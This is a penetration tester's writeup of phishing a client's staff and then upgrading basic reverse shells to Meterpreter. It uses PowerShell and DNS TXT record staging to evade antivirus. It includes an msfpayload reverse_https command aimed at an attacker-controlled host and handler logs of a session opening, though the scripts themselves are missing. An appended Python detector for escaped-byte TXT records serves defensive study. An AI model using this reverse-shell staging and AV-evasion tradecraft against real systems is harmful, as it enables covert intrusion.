A few months back, while I was on holiday, I got a call from work: we had just taken on an urgent project with a very short delivery time. The project was a penetration test for a company. All the paperwork was done and the client was in a rush to get some results, since the holiday season was near.
No problem, I said, but actually there were a few. For starters, I was in a different country, nowhere near the company's penetration lab and my tools. As is customary, I also started with zero knowledge of the client's systems, so I wasn't sure about their security: possible IDS systems, antivirus, system patches, firewalls and the users' level of experience.
There are many possible ideas and ways to work here; I chose to use Metasploit and whatever tools looked innocent enough not to raise suspicion. The common problem with Metasploit is payload delivery. Meterpreter is great, but it is detected by a very large number of antivirus products if not properly modified. I used SET (http://www.social-engineer.org/) to deliver a simple payload, actually a very basic connect-back shell, the first one I found on codeproject.com (http://www.codeproject.com/Articles/20250/Reverse-Connection-Shell).
A couple of hours later, after a few emails with 'important' information had been sent to the company's users, Metasploit's multi/handler was greeted with sessions. The sessions were mostly from Windows 7 systems and a few old XP machines. The good news and the bad news: the good news was the shells, the bad news was ... the shells. After working with Meterpreter sessions and sessions from commercial tools, the basic DOS prompt seems poor. Time to upgrade the shell, then, in a fancy way.
PowerShell to the rescue!
Let's first generate the Meterpreter payload; reverse_https seems great:
root@host:~/trunk# ./msfpayload windows/meterpreter/reverse_https LHOST=178.32.xxx.xxx LPORT=8443 C | more
From the whole payload we just need the first stage. The first stage provides the connect-back to the Metasploit server, which then fetches the second stage.
Here again there are a couple of options. One way of delivering it is the following: simply copy the first stage, convert it into the format the PowerShell script expects and run the script.
Converting the shellcode to the format needed by the PowerShell script:
Converting the shellcode directly to our format:
And our PowerShell script:
Set the Metasploit server to handle requests for the payload:
And there it is: our poor initial shell, upgraded with Meterpreter features, while the antivirus is still operational and unaware of the situation.
Method 2: do it in style.
A few weeks back I saw an excellent method from corelanc0d3r (https://github.com/rapid7/metasploit-framework/pull/173) using DNS TXT records for payload delivery. This gave me the idea to build the same method with PowerShell, also using raw C format in the TXT records. With the same payload, stage 1 as above, I created the following records:
And finally the PowerShell script to call the records:
Make sure the Metasploit server is running with multi/handler, and call the script from within PowerShell with: & .\Desktop\powershellcode1.ps1
Enjoy a 0-detection Metasploit shell.
[*] Started HTTPS reverse handler on https://178.32.xxx.xxx:8443/
[*] Exploit running as background job.
[*] Starting the payload handler...
[*] 94.68.xxx.xxx:27789 Request received for /Zbi7...
[*] 94.68.xxx.xxx:27789 Staging connection for target /Zbi7 received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (178.32.xxx.xxx:8443 -> 94.68.xxx.xxx:27789) at Wed Apr 11 13:16:17 +0300 2012
msf exploit(handler) >
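From the defender's side, the staging used in Method 2 leaves a distinctive trace in DNS logs: TXT answers consisting almost entirely of raw C "\xNN" byte escapes, often split across several sibling records. The following Python is added here and is not part of the original post; it scans (owner name, TXT string) pairs such as a passive-DNS log would yield, and the record names and byte blobs are constructed samples, not real payload.

```python
import re
from collections import defaultdict

# One C-style "\xNN" escape as it appears inside the text of a TXT record.
C_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")

def escaped_byte_ratio(txt):
    """Fraction of the record text taken up by \\xNN escapes (0.0 .. 1.0)."""
    if not txt:
        return 0.0
    return 4 * len(C_ESCAPE.findall(txt)) / len(txt)

def analyze_txt_records(records, min_len=64, min_ratio=0.8):
    """Flag TXT answers that are mostly \\xNN escapes and long enough to carry code.

    records: iterable of (owner_name, txt_string) pairs. Returns one finding per
    flagged record and the total number of encoded bytes per parent zone, so a
    stage split over several sibling records is visible as one blob.
    """
    findings, per_zone = [], defaultdict(int)
    for name, txt in records:
        ratio = escaped_byte_ratio(txt)
        if len(txt) < min_len or ratio < min_ratio:
            continue                      # ordinary SPF/DMARC/verification text
        nbytes = len(C_ESCAPE.findall(txt))
        zone = name.split(".", 1)[-1]     # owner minus its first label
        per_zone[zone] += nbytes
        findings.append({"name": name, "zone": zone,
                         "bytes": nbytes, "ratio": round(ratio, 2)})
    return findings, dict(per_zone)

def _fake_blob(start, count):
    """Constructed placeholder bytes (a simple counter, not code) in raw C format."""
    return "".join(f"\\x{(start + i) & 0xff:02x}" for i in range(count))

# Constructed sample answers: two benign records and a blob split across two
# sibling TXT records, the shape the delivery method above produces.
SAMPLE_TXT = [
    ("corp.example", "v=spf1 include:_spf.example.com -all"),
    ("_dmarc.corp.example", "v=DMARC1; p=reject; rua=mailto:dmarc@corp.example"),
    ("s1.stage.example", _fake_blob(0x00, 120)),
    ("s2.stage.example", _fake_blob(0x78, 120)),
]

if __name__ == "__main__":
    hits, zones = analyze_txt_records(SAMPLE_TXT)
    for h in hits:
        print(f"{h['name']}: {h['bytes']} bytes, escape ratio {h['ratio']}")
    print("encoded bytes per zone:", zones)
```

Thresholds are deliberately loose; a stage-1 blob runs to hundreds of bytes, while legitimate TXT records rarely contain any \xNN escapes at all.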